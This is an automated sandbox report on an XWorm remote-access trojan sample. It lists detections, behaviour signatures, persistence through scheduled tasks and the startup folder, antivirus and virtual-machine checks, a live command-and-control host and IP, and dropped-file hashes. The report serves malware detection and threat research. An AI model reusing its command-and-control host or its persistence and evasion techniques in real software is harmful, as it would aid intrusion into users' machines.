                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\SYSTEMQueries volume information: C:\Users\user\AppData\Roaming\SYSTEM VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\SYSTEMQueries volume information: C:\Users\user\AppData\Roaming\SYSTEM VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\SYSTEMQueries volume information: C:\Users\user\AppData\Roaming\SYSTEM VolumeInformation
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: ANuh30XoVu.exe, 00000000.00000002.2940018560.000000001C190000.00000004.00000020.00020000.00000000.sdmp, ANuh30XoVu.exe, 00000000.00000002.2940018560.000000001C130000.00000004.00000020.00020000.00000000.sdmp, ANuh30XoVu.exe, 00000000.00000002.2897412688.0000000001403000.00000004.00000020.00020000.00000000.sdmp, ANuh30XoVu.exe, 00000000.00000002.2940018560.000000001C1F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                    Source: C:\Users\user\Desktop\ANuh30XoVu.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: ANuh30XoVu.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.ANuh30XoVu.exe.f30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2906383294.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ANuh30XoVu.exe PID: 6936, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPED

                    Remote Access Functionality

                    barindex
                    Yara detected XWorm
                    Source: Yara matchFile source: ANuh30XoVu.exe, type: SAMPLE
                    Source: Yara matchFile source: 0.0.ANuh30XoVu.exe.f30000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000000.1645179483.0000000000F32000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2906383294.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: ANuh30XoVu.exe PID: 6936, type: MEMORYSTR
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\SYSTEM, type: DROPPED

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                    Windows Management Instrumentation                    		1
                    Scheduled Task/Job                    		11
                    Process Injection                    		11
                    Masquerading                    		OS Credential Dumping541
                    Security Software Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		2
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		11
                    Disable or Modify Tools                    		LSASS Memory1
                    Process Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Non-Standard Port                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    PowerShell                    		1
                    DLL Side-Loading                    		2
                    Registry Run Keys / Startup Folder                    		151
                    Virtualization/Sandbox Evasion                    		Security Account Manager151
                    Virtualization/Sandbox Evasion                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Ingress Tool Transfer                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    DLL Side-Loading                    		11
                    Process Injection                    		NTDS1
                    Application Window Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information                    		LSA Secrets1
                    System Network Configuration Discovery                    		SSHKeylogging12
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Obfuscated Files or Information                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                    Software Packing                    		DCSync23
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    DLL Side-Loading                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1583090 Sample: ANuh30XoVu.exe Startdate: 01/01/2025 Architecture: WINDOWS Score: 100 40 pro-favorite.gl.at.ply.gg 2->40 42 ip-api.com 2->42 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 14 other signatures 2->54 8 ANuh30XoVu.exe 14 6 2->8         started        13 SYSTEM 2->13         started        15 SYSTEM 2->15         started        17 SYSTEM 2->17         started        signatures3 process4 dnsIp5 44 pro-favorite.gl.at.ply.gg 147.185.221.24, 49739, 49874, 50004 SALSGIVERUS United States 8->44 46 ip-api.com 208.95.112.1, 49730, 80 TUT-ASUS United States 8->46 38 C:\Users\user\AppData\Roaming\SYSTEM, PE32 8->38 dropped 58 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->58 60 Protects its processes via BreakOnTermination flag 8->60 62 Bypasses PowerShell execution policy 8->62 70 4 other signatures 8->70 19 powershell.exe 23 8->19         started        22 powershell.exe 23 8->22         started        24 powershell.exe 23 8->24         started        26 2 other processes 8->26 64 Antivirus detection for dropped file 13->64 66 Multi AV Scanner detection for dropped file 13->66 68 Machine Learning detection for dropped file 13->68 file6 signatures7 process8 signatures9 56 Loading BitLocker PowerShell Module 19->56 28 conhost.exe 19->28         started        30 conhost.exe 22->30         started        32 conhost.exe 24->32         started        34 conhost.exe 26->34         started        36 conhost.exe 26->36         started        process10

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    ANuh30XoVu.exe76%ReversingLabsWin32.Exploit.Xworm
                    ANuh30XoVu.exe68%VirustotalBrowse
                    ANuh30XoVu.exe100%AviraTR/Spy.Gen
                    ANuh30XoVu.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\SYSTEM100%AviraTR/Spy.Gen
                    C:\Users\user\AppData\Roaming\SYSTEM100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\SYSTEM76%ReversingLabsWin32.Exploit.Xworm

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    pro-favorite.gl.at.ply.gg100%Avira URL Cloudmalware
                    https://ion=v4.5350%Avira URL Cloudsafe
                    http://www.microsoft.coiops0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ip-api.com
                    		208.95.112.1
                    		truefalse
                      		high
                      pro-favorite.gl.at.ply.gg
                      		147.185.221.24
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        pro-favorite.gl.at.ply.ggtrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://ip-api.com/line/?fields=hostingfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1736972928.00000214DA590000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1826514994.00000252F3790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1967813052.0000027B1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.microsoft.coiopspowershell.exe, 0000000B.00000002.2194837469.0000023F1E3E4000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000001.00000002.1722128488.00000214CA749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3948000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000001.00000002.1722128488.00000214CA749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3948000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://contoso.com/powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1736972928.00000214DA590000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1826514994.00000252F3790000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1967813052.0000027B1006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.microsoft.copowershell.exe, 0000000B.00000002.2194837469.0000023F1E3E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2167635487.0000023F15CBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://aka.ms/pscore68powershell.exe, 00000001.00000002.1722128488.00000214CA521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameANuh30XoVu.exe, 00000000.00000002.2906383294.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1722128488.00000214CA521000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1767390407.00000252E3721000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1870670425.0000027B00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2041403047.0000023F05C51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2041403047.0000023F05E79000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://ion=v4.535powershell.exe, 00000001.00000002.1743651589.00000214E2AE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    208.95.112.1
                                                    		ip-api.comUnited States
                                                    		53334TUT-ASUSfalse
                                                    147.185.221.24
                                                    		pro-favorite.gl.at.ply.ggUnited States
                                                    		12087SALSGIVERUStrue

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1583090
                                                    Start date and time:2025-01-01 21:56:07 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 6m 18s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:19
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:ANuh30XoVu.exe
                                                    renamed because original name is a hash value
                                                    Original Sample Name:a8bd024f05a7430ed667070ea680d7b4f80dc0d6a2cf6149874a1d784aa5b47e.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.evad.winEXE@19/21@2/2
                                                    EGA Information:
                                                    • Successful, ratio: 12.5%
                                                    HCA Information:
                                                    • Successful, ratio: 89%
                                                    • Number of executed functions: 89
                                                    • Number of non-executed functions: 5
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target SYSTEM, PID 2252 because it is empty
                                                    • Execution Graph export aborted for target SYSTEM, PID 4140 because it is empty
                                                    • Execution Graph export aborted for target SYSTEM, PID 6292 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 2004 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 4944 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 5848 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 6264 because it is empty
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    15:57:01API Interceptor50x Sleep call for process: powershell.exe modified
                                                    15:57:56API Interceptor260794x Sleep call for process: ANuh30XoVu.exe modified
                                                    20:57:54Task SchedulerRun new task: SYSTEM path: C:\Users\user\AppData\Roaming\SYSTEM
                                                    20:57:57AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SYSTEM.lnk

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    208.95.112.1rivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                    • ip-api.com/json
                                                    vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                    • ip-api.com/xml
                                                    Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                    • ip-api.com/json/?fields=225545
                                                    Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                    • ip-api.com/json/?fields=61439
                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                    • ip-api.com/json/
                                                    SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                    • ip-api.com/json/?fields=61439
                                                    987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                    • ip-api.com/line/?fields=hosting
                                                    good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                    • ip-api.com/json/
                                                    147.185.221.24p59UXHJRX3.exeGet hashmaliciousXenoRATBrowse
                                                      JdYlp3ChrS.exeGet hashmaliciousNjratBrowse
                                                        Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                          test.exeGet hashmaliciousDarkCometBrowse
                                                            L363rVr7oL.exeGet hashmaliciousNjratBrowse
                                                              horrify's Modx Menu v1.exeGet hashmaliciousXWormBrowse
                                                                fvbhdyuJYi.exeGet hashmaliciousXWormBrowse
                                                                  8DiSW8IPEF.exeGet hashmaliciousXWormBrowse
                                                                    KJhsNv2RcI.exeGet hashmaliciousXWormBrowse
                                                                      PjGz899RZV.exeGet hashmaliciousXWormBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        ip-api.comrivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                        • 208.95.112.1
                                                                        vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                        • 208.95.112.1
                                                                        Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                        • 208.95.112.1
                                                                        Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                        • 208.95.112.1
                                                                        SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                        • 208.95.112.1
                                                                        SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                        • 208.95.112.1
                                                                        987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                        • 208.95.112.1

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        TUT-ASUSrivalsanticheat.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        rename_me_before.exeGet hashmaliciousPython Stealer, Exela StealerBrowse
                                                                        • 208.95.112.1
                                                                        vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
                                                                        • 208.95.112.1
                                                                        Fizzy Loader.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                        • 208.95.112.1
                                                                        Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                        • 208.95.112.1
                                                                        VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                        • 208.95.112.1
                                                                        SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                        • 208.95.112.1
                                                                        SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                        • 208.95.112.1
                                                                        987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                        • 208.95.112.1
                                                                        good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                        • 208.95.112.1
                                                                        SALSGIVERUSp59UXHJRX3.exeGet hashmaliciousXenoRATBrowse
                                                                        • 147.185.221.24
                                                                        JdYlp3ChrS.exeGet hashmaliciousNjratBrowse
                                                                        • 147.185.221.24
                                                                        Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                        • 147.185.221.24
                                                                        OneDrive.exeGet hashmaliciousQuasarBrowse
                                                                        • 147.185.221.22
                                                                        gReXLT7XjR.exeGet hashmaliciousNjratBrowse
                                                                        • 147.185.221.18
                                                                        _____.exeGet hashmaliciousDarkCometBrowse
                                                                        • 147.185.221.23
                                                                        test.exeGet hashmaliciousDarkCometBrowse
                                                                        • 147.185.221.24
                                                                        L363rVr7oL.exeGet hashmaliciousNjratBrowse
                                                                        • 147.185.221.24
                                                                        WO.exeGet hashmaliciousMetasploitBrowse
                                                                        • 147.185.221.23
                                                                        reddit.exeGet hashmaliciousMetasploitBrowse
                                                                        • 147.185.221.23

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SYSTEM.log

                                                                        Download File
                                                                        Process:C:\Users\user\AppData\Roaming\SYSTEM
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................

                                                                        C:\Users\user\AppData\Local\Temp\Log.tmp

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\ANuh30XoVu.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):29
                                                                        Entropy (8bit):3.598349098128234
                                                                        Encrypted:false
                                                                        SSDEEP:3:rRSFYJKXzovNsra:EFYJKDoWra
                                                                        MD5:2C11513C4FAB02AEDEE23EC05A2EB3CC
                                                                        SHA1:59177C177B2546FBD8EC7688BAD19D08D32640DE
                                                                        SHA-256:BCF3676333E528171EEE1055302F3863A0C89D9FFE7017EA31CF264E13C8A699
                                                                        SHA-512:08196AFA62650F1808704DCAD9918DA11175CD8792878F63E35F517B4D6CF407AC9E281D9B71A76E4CC1486CAD7079C56B74ECBEDB0A0F0DD4170FB0D30D2BAD
